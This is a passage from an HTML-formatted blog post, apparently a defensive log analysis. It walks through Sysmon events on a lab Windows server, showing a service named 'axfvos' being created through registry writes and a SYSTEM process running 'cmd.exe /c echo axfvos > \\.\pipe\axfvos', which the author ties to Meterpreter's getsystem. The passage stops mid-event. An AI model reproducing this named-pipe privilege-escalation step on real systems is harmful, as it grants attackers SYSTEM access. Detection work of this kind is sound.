#f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">DestinationIp: 10.47.47.26</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">DestinationHostname: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">DestinationPort: 80</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">DestinationPortName: http</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Then a bit later we have a Registry value set event related to creation of a new service:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:04:17 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>13</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Task Category: Registry value set (rule: RegistryEvent)</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Registry value set:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: T1031,T1050</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">EventType: SetValue</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">UtcTime: 2020-07-19 20:04:17.209</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessGuid: {fc3f293c-bb4e-5f13-9e5b-000000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessId: 468</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Image: C:\Windows\system32\services.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">TargetObject: HKLM\System\CurrentControlSet\Services\axfvos\Start</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Details: DWORD (0x00000003)</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Followed by another related Registry value set event:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:04:17 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>13</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Task Category: Registry value set (rule: RegistryEvent)</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Registry value set:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: T1031,T1050</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">EventType: SetValue</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:04:17.209</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessGuid: {fc3f293c-bb4e-5f13-9e5b-000000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessId: 468</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Image: C:\Windows\system32\services.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">TargetObject: HKLM\System\CurrentControlSet\Services\axfvos\ImagePath</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Details: cmd.exe /c echo axfvos > \\.\pipe\axfvos</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">And a blink later, a related process creation event:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:04:17 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>1</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Task Category: Process Create (rule: ProcessCreate)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Process Create:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:04:17.225</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessGuid: {fc3f293c-a741-5f14-920b-440000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessId: 1720</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Image: C:\Windows\System32\cmd.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">FileVersion: 6.2.9200.16384 (win8_rtm.120725-1247)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description: Windows Command Processor</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Product: Microsoft® Windows® Operating System</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Company: Microsoft Corporation</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">OriginalFileName: Cmd.Exe</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">CommandLine: cmd.exe /c echo axfvos > \\.\pipe\axfvos</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">CurrentDirectory: C:\Windows\system32\</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">User: NT AUTHORITY\SYSTEM</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">LogonGuid: {fc3f293c-bb4e-5f13-e703-000000000000}</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">LogonId: 0x3E7</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">TerminalSessionId: 0</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">IntegrityLevel: System</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Hashes: MD5=BF93A2F9901E9B3DFCA8A7982F4A9868,SHA256=858A5766A2DE54A6908A2CA30DD5983790B8C63614A455292613B129877223E9,IMPHASH=B16908B0B9C28132BF70555413F2F045</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessGuid: {fc3f293c-bb4e-5f13-9e5b-000000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessId: 468</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentImage: C:\Windows\System32\services.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentCommandLine: C:\Windows\system32\services.exe</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">A little searching online and you'll find references indicating this is probably related to Meterpreter's </font><a href="https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/" target="_blank"><font face="courier">getsystem</font></a><font face="inherit"> command.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Followed by another Registry set value event, probably cleaning up the service as it is no longer needed.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:04:17 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>13</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Task Category: Registry value set (rule: RegistryEvent)</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 